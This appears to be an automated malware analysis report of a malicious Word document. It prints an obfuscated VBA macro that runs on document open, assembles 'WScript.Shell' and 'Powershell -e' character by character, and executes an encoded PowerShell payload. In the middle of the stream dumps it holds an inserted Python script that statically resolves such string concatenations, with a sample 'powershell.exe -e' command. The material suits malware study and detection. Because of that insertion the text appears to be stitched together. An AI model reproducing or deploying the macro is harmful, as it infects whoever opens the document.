                                                         'ZfLOgvfxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
                                                         'GOssUAsGxypBpvvkhDZLBBCCyiCywGCEfOwAfkCxMrMkTJvnEyGJQAJkfhyMGyfypUAwxDTnJnLxBrkGABrCQTErkAvBsCUxJZOnUCThQJQwkvZpnJGkEkyTrUpphUfxLnTTCLOhZfCATwDxkfnxiGknGrxMsxQZEyOLLhfUOMBGvCMExGLwOLfTUUhknprnDwiMZZEEMLDiJEwZTLTvEMsAkTsDMvinvMECGQpwDJEJUUfTTvfyTUCfhvOGOhErAfskQyTrpEADBCTAkiiEpwZJrGykLxZBfnyLCCrnkpvwvpJxLBBQiMxOZCGDQfsGpDMnhshCTOAMyLZxBAnxvLhfTvnQiknTBOLpALTUOwvnhxrwwxGhhkkJBsZLfGGfAUEvMApyUkDxvJnAZBMfEpGUJwsnMsZZfpGOLUEJAOpBTvxUfOMhhwAQkCUBnsUxnLifEhLDCOExQkwZiysJDrTsnfJvQTkMEGMshUTBJfxUnJQQZDJZ
                                                         t = Timer
                                                            Dim MyRange As Range
                                                                Dim MyCell As Range
                                                            'Save the Workbook before changing cells
                                                                  'Copy the data
                                                          
                                                            'Define the target Range.    'Save the Workbook before changing cells
                                                                  'Copy the data
                                                            'Selection.FormatConditions(1).StopIfTrue = False
                                                            'Define the target Range.
                                                         
                                                        On Error Resume Next
                                                        VprcMvTybtWCrceoHvvQyDD.Tables(1).Delete
                                                        VprcMvTybtWCrceoHvvQyDD.WFnhePfKQR
                                                        WFnhePfKQR.Bookmarks.Add "WFnhePfKQR", VprcMvTybtWCrceoHvvQyDD
                                                        'WFnhePfKQR WFnhePfKQR
                                                        'MsgBox ("zSG   MwGaJWMtUaonakiksIhs")
                                                        'pyYwkPhcRrowVCEdAUrhEsYKBXMQOBcobAaUbkOMGZVdtzZYKZMyN
                                                        'GwQkXHAHkyKtCWONPARvkHzfBMpRYOfELQeANpiAciUMwkVfSOztYHiXRppPUJJYofLMRSFFutKbONVQQfYwrNGd
                                                        Dim RsoXaQzRZLepceHbdJWVCWvy, wkFG
                                                        'vAib
                                                        'zSAfQhZXeDrsWescZH
                                                        'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
                                                        KbR = "P": dTeRavdQLFiaRCHrHyuXdeHybQeFIYC = "o": DLszaNoPwSTucJvPenyIHhc = "w": wIZODYVPDCMy = "e": JAusDBfPdQy = "r": duEZDXrOJdeWkYVtTepnzoLHCY = "s": Cf = "h": WXdwDWONPKC = "e": avchVXNDYcPYTstAYhuGKhrTaTF = "l": eUoiAJtFvyGJNebIdK = "l":
                                                        'VrYIweaXzFDiXhfXpVoMWSuUTosuuwDpCKceik
                                                        'VprcMvTybtWCrceoHvvQyDD  IfHBhDnuXCPPOTzOEwVa
                                                        'HZLVpOHOvAFOPHKCOiiAoKd  WFnhePfKQR
                                                        'oQcNNwneBDkaphvLVEeeiRIMsGzUVGWYLwIWdREvmvAZbCPPTAPKp sAUsICOuRHVAkoJLyAHGFPSyN
                                                        With Selection
                                                        .Borders(xlDiagonalDown).LineStyle = xlNone
                                                        .Borders(xlDiagonalUp).LineStyle = xlNone
                                                        .Borders(xlEdgeLeft).LineStyle = xlNone
                                                        .Borders(xlEdgeTop).LineStyle = xlNone
                                                        .Borders(xlEdgeBottom).LineStyle = xlNone
                                                        .Borders(xlEdgeRight).LineStyle = xlNone
                                                        .Borders(xlInsideVertical).LineStyle = xlNone
                                                        .Borders(xlInsideHorizontal).LineStyle = xlNone
                                                        End With
                                                        With Application.FileSearch
                                                        .NewSearch
                                                        'Change path to suit
                                                        .LookIn = "WFnhePfKQR"
                                                        .FileType = msoFileTypeExcelWorkbooks
                                                        If .Execute > 0 Then
                                                        For lCount = 1 To .FoundFiles.Count
                                                        Set wbResults = Workbooks.Open(FileName:=.FoundFiles(lCount), UpdateLinks:=0)
                                                        wbResults.Close SaveChanges:=True
                                                        Next lCount
                                                        End If
                                                        End With
                                                        Application.ScreenUpdating = True
                                                        Application.DisplayAlerts = True
                                                        'WFnhePfKQR  DaIWJdWiZZvwD
                                                        '  yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
                                                        'khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI  RrEFfsdBSDRSvDUIiatMvCDoUcGQekfhMSSiJpkUiVEUzXHRSbXAVKCnSvLdPotptLfyMwYXSDEtZKyXBPYdwwvdtYrydf
                                                        ' YbzCBveVatYsAUTyQCGXiuehbzWOeYr
                                                        'XaiAZGbTUWBFpSreBHFnfEsUYcLad
                                                        'baTEDvFnPTPpuJoaLzhYw
                                                        'hZFHaVcOKPdUrAuXVvOJs
                                                        'RrEFfsdBSDRSvDUIiatMvCDoUcGQekfhMSSiJpkUiVEUzXHRSbXAVKCnSvLdPotptLfyMwYXSDEtZKyXBPYdwwvdtYrydf
                                                        Dim MwGaJWMtUaonakiksIhs As Long
                                                        'MsgBox Prompt:="IfHBhDnuXCPPOTzOEwVa?", Buttons:=DaIWJdWiZZvwD , Title:="YbzCBveVatYsAUTyQCGXiuehbzWOeYr   "
                                                        'ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
                                                        
                                                        '   khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI
                                                        Dim r As Long, x As Long
                                                        For x = 2 To r Step 1
                                                        r = r - 1
                                                        Next x
                                                        'zXJRDVFfnEbUETkMdMFHN
                                                        'WFnhePfKQR  ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
                                                        'zXJRDVFfnEbUETkMdMFHN
                                                        'WFnhePfKQR   IfHBhDnuXCPPOTzOEwVa
                                                        'LYfutprNPzcESQiHeZEdwZRYwQrdXNWAnMoNJSvTwKoQhpNWIVVRIeMpiKGGVQRcCHpKDzXvOKyFncSbI   DaIWJdWiZZvwD
                                                        'khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI  yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
                                                        'WFnhePfKQR  ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
                                                        wkFG = KbR + dTeRavdQLFiaRCHrHyuXdeHybQeFIYC + DLszaNoPwSTucJvPenyIHhc + wIZODYVPDCMy + JAusDBfPdQy + duEZDXrOJdeWkYVtTepnzoLHCY + Cf + WXdwDWONPKC + avchVXNDYcPYTstAYhuGKhrTaTF + eUoiAJtFvyGJNebIdK + "  -e  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"""""
                                                        'ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
                                                        'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
                                                        'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
                                                        ' ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
                                                        Dim PcLEMdZaBZ As Long
                                                        Dim rhcIhwX As String
                                                        Dim dfC As Long
                                                        
                                                        
                                                        
                                                        
                                                        
                                                        
                                                        'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
                                                        
                                                        
                                                        
                                                        
                                                        
                                                        
                                                        
                                                        
                                                        zXJRDVFfnEbUETkMdMFHN = "W": nYXOavcKzIMpBcpPTUXXH = "S": wYvKDGFpELyFyvwTfdsoC = "c": hZFHaVcOKPdUrAuXVvOJs = "r": baTEDvFnPTPpuJoaLzhYw = "i": EXrVaGcGkBrFHKhIoEivS = "p": IWcZEvFbdtKpLBfEDsOWX = "h": MVOcbVdCYnYUNudBNksGd = "t": WFnhePfKQR = ".":
                                                        UUh = "s":
                                                        YUQGTcCcXIokXZANQUPNKA = "e": 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
                                                        zFKcHMiERAysafHJOIRHWNTtno = "l": 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
                                                        UwFFnsSaLuaDdvPFLsSAibHYWr = "l" 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
                                                        'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
                                                        'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
                                                        KbR = zXJRDVFfnEbUETkMdMFHN + nYXOavcKzIMpBcpPTUXXH + wYvKDGFpELyFyvwTfdsoC + hZFHaVcOKPdUrAuXVvOJs + baTEDvFnPTPpuJoaLzhYw + EXrVaGcGkBrFHKhIoEivS + MVOcbVdCYnYUNudBNksGd + WFnhePfKQR + UUh + IWcZEvFbdtKpLBfEDsOWX + YUQGTcCcXIokXZANQUPNKA + zFKcHMiERAysafHJOIRHWNTtno + UwFFnsSaLuaDdvPFLsSAibHYWr
                                                        'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
                                                        'wHrUtRPzQDKoZdXKKCGphYZeQaHIRfOkuNQWfOnbCQZwBZKwhadU
                                                        'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
                                                        Set RsoXaQzRZLepceHbdJWVCWvy = CreateObject(KbR)  'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
                                                        RsoXaQzRZLepceHbdJWVCWvy.Run wkFG, 858235310:
                                                        'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
                                                        'Declare your variables
                                                                Dim yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh As Range
                                                                Dim ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe As Range
                                                            'Save the Workbook before changing cells
                                                                Select Case MsgBox("Can't Undo this action.  " &                             "Save Workbook First?", vbYesNoCancel)
                                                                    Case Is = vbYes
                                                                    ThisWorkbook.Save
                                                                    Case Is = vbCancel
                                                                    Exit Sub
                                                                End Select
                                                            'Define the target Range.
                                                                Set MyRange = Selection
                                                            'Start looping through the range.
                                                                For Each MyCell In MyRange
                                                            'Trim the Spaces.
                                                                    If Not IsEmpty(MyCell) Then
                                                                        MyCell = Trim(MyCell)
                                                                    End If
                                                            'Get the next cell in the range
                                                                Next MyCell
                                                           
                                                        End Sub
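The macro above assembles the argument of CreateObject from a dozen variables (KbR = zXJRDVFfnEbUETkMdMFHN + ...) and then calls .Run on the resulting object with a second variable, wkFG. The values of those variables, and therefore the ProgID and the command that were actually executed, are not reproduced on this page. The script below is an added example and not part of the report or of the sample: it resolves static string concatenations in VBA so that such arguments can be read out without running the macro. It runs over a constructed macro fragment whose literals spell WScript.Shell, which is an assumption consistent with the two-argument .Run call but not confirmed here, and a placeholder command for wkFG.

```python
import re

# Constructed sample macro, modelled on the obfuscation pattern in the report above.
# The real values of the concatenated variables are not shown on this page, so the
# literal fragments (spelling "WScript.Shell") and the command in wkFG are assumptions.
SAMPLE_VBA = '''\
Sub awndjfawdwd()
    zXJRDVFfnEbUETkMdMFHN = "WS"
    nYXOavcKzIMpBcpPTUXXH = "cr" & "ipt"
    'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
    wYvKDGFpELyFyvwTfdsoC = "." + "Sh"
    hZFHaVcOKPdUrAuXVvOJs = "ell"   'trailing junk comment
    KbR = zXJRDVFfnEbUETkMdMFHN + nYXOavcKzIMpBcpPTUXXH + wYvKDGFpELyFyvwTfdsoC + hZFHaVcOKPdUrAuXVvOJs
    wkFG = "powershell.exe -e " + "SQBFAFgA"
    Set RsoXaQzRZLepceHbdJWVCWvy = CreateObject(KbR)
    RsoXaQzRZLepceHbdJWVCWvy.Run wkFG, 858235310
End Sub
'''

# One token of a VBA expression: a string literal, an identifier, a concatenation
# operator, or anything else (which makes the expression non-static).
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)|([+&])|(\S)')
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.*?)\s*$')


def strip_comment(line):
    """Drop a trailing VBA comment (') unless the apostrophe sits inside a string literal."""
    in_str, kept = False, []
    for ch in line:
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            break
        kept.append(ch)
    return ''.join(kept)


def collect_assignments(src):
    """Map variable name -> right-hand side for plain 'name = expr' lines (Set lines skipped)."""
    env = {}
    for raw in src.splitlines():
        line = strip_comment(raw)
        if line.lstrip().lower().startswith('set '):
            continue
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = m.group(2)
    return env


def evaluate(expr, env, depth=0):
    """Resolve an expression made only of string literals and variables joined by + or &.
    Returns None if it uses anything else (function calls, numbers, unknown names)."""
    if depth > 64:                      # guard against self-referential assignments
        return None
    out = []
    for m in TOKEN_RE.finditer(expr):
        kind = m.lastindex
        if kind == 1:                   # "literal" ("" inside a literal is an escaped quote)
            out.append(m.group(1).replace('""', '"'))
        elif kind == 2:                 # variable reference: resolve recursively
            name = m.group(2)
            if name not in env:
                return None
            value = evaluate(env[name], env, depth + 1)
            if value is None:
                return None
            out.append(value)
        elif kind == 3:                 # + or & : concatenation, nothing to emit
            continue
        else:                           # parentheses, digits, commas ... not a static string
            return None
    return ''.join(out)


def resolve_all(src):
    """Every variable whose value is a statically resolvable string."""
    env = collect_assignments(src)
    resolved = {}
    for name, expr in env.items():
        value = evaluate(expr, env)
        if value is not None:
            resolved[name] = value
    return resolved


def find_dynamic_calls(src):
    """Report the resolved argument of each CreateObject(var) and .Run var in the macro."""
    resolved = resolve_all(src)
    calls = []
    for m in re.finditer(r'CreateObject\(\s*([A-Za-z_]\w*)\s*\)', src):
        calls.append(('CreateObject', resolved.get(m.group(1), '<unresolved>')))
    for m in re.finditer(r'\.Run\s+([A-Za-z_]\w*)', src):
        calls.append(('Run', resolved.get(m.group(1), '<unresolved>')))
    return calls


if __name__ == '__main__':
    for call, arg in find_dynamic_calls(SAMPLE_VBA):
        print(f'{call}: {arg}')
```

The resolver deliberately gives up (returns None) as soon as an expression contains anything other than literals and variables; a macro that builds its strings with Chr(), StrReverse() or Replace() needs an emulator rather than static resolution, and reporting "unresolved" is better than guessing.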
                                                        

General
Stream Path: Macros/VBA/ThisDocument
VBA File Name: ThisDocument.cls
Stream Size: 203
                                                        Data ASCII:. . . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . S u b q _ O p . e n ( ) . . a w . n d j f a w d w @ d . . E n d . . . .
                                                        Data Raw:01 c7 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
                                                        Attribute VB_Name = "ThisDocument"
                                                        Attribute VB_Base = "1Normal.ThisDocument"
                                                        Attribute VB_GlobalNameSpace = False
                                                        Attribute VB_Creatable = False
                                                        Attribute VB_PredeclaredId = True
                                                        Attribute VB_Exposed = True
                                                        Attribute VB_TemplateDerived = True
                                                        Attribute VB_Customizable = True
                                                        Private Sub Document_Open()
                                                        awndjfawdwd
                                                        End Sub
                                                        

General
Stream Path: \x1CompObj
CLSID:
File Type: data
Stream Size: 118
Entropy: 4.268110596474915
Base64 Encoded: True
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . F $ . . . D o c u m e n t o d o M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 24 00 00 00 44 6f 63 75 6d 65 6e 74 6f 20 64 6f 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path: \x5DocumentSummaryInformation
CLSID:
File Type: data
Stream Size: 260
Entropy: 2.3390993345415625
Base64 Encoded: False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . t . u . l . o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 0a 00 00 00 01 00 00 00 58 00 00 00 0b 00 00 00 60 00 00 00 11 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 0c 00 00 00 7c 00 00 00 05 00 00 00 a4 00 00 00 10 00 00 00 ac 00 00 00 06 00 00 00 b4 00 00 00 0d 00 00 00 bc 00 00 00
General
Stream Path: \x5SummaryInformation
CLSID:
File Type: data
Stream Size: 512
Entropy: 2.8735362928076102
Base64 Encoded: False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . i . a . g . o . . O . l . i . v . e . i . r . a . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . h ( i c . . . .
                                                        Data Raw:fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 01 00 00 12 00 00 00 01 00 00 00 98 00 00 00 04 00 00 00 a0 00 00 00 10 00 00 00 c8 00 00 00 06 00 00 00 d0 00 00 00 0c 00 00 00 dc 00 00 00 05 00 00 00 e8 00 00 00 0b 00 00 00 f4 00 00 00 08 00 00 00 00 01 00 00 0d 00 00 00 28 01 00 00
General
Stream Path: 1Table
CLSID:
File Type: data
Stream Size: 2934
Entropy: 3.1813737579527164
Base64 Encoded: False
                                                        Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                                                        Data Raw:6a 04 0f 00 12 00 01 00 0b 01 0f 00 00 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
General
Stream Path: Macros/PROJECT
CLSID:
File Type: ASCII text, with CRLF line terminators
Stream Size: 218
Entropy: 4.978459919366058
Base64 Encoded: True
                                                        Data ASCII:I D = " { 1 8 E 2 6 B 3 B - 0 E 2 5 - 4 6 A 3 - 8 C 3 D - 3 C 9 6 D A D 6 8 0 C 7 } " . . D o c u m e n t = T h i s D o c u m e n t . . M o d u l e = N e w M o d u l e . . N a m e = " P r o j e c t " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 3 3 C 1 3 7 C 1 3 7 C 1 3 7 C 1 3 7 " . . D P B = " D A D 8 3 1 C 1 3 2 C 2 3 2 C 2 3 2 " . . G C = " D C D E 3 7 C B 3 B C C 3 C C C 3 C 3 3 " . .
                                                        Data Raw:49 44 3d 22 7b 31 38 45 32 36 42 33 42 2d 30 45 32 35 2d 34 36 41 33 2d 38 43 33 44 2d 33 43 39 36 44 41 44 36 38 30 43 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 6f 64 75 6c 65 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33 32 3d 22 33 39 33 32 32
General
Stream Path: Macros/VBA/_VBA_PROJECT
CLSID:
File Type: ISO-8859 text, with no line terminators
Stream Size: 7
Entropy: 1.8423709931771088
Base64 Encoded: False
                                                        Data ASCII:a . . .
                                                        Data Raw:cc 61 ff ff 00 00 00
General
Stream Path: Macros/VBA/dir
CLSID:
File Type: data
Stream Size: 529
Entropy: 6.335437239038614
Base64 Encoded: True
                                                        Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . _ , f . . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ S y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c . E C . . . . } \\ , f . ! O f f i c g O . f . i . c g . . g 2 D F 8 . D 0 4 C - 5
                                                        Data Raw:01 0d b2 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 15 5f 2c 66 06 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30
General
Stream Path: WordDocument
CLSID:
File Type: data
Stream Size: 3630
Entropy: 0.7564027997021255
Base64 Encoded: False
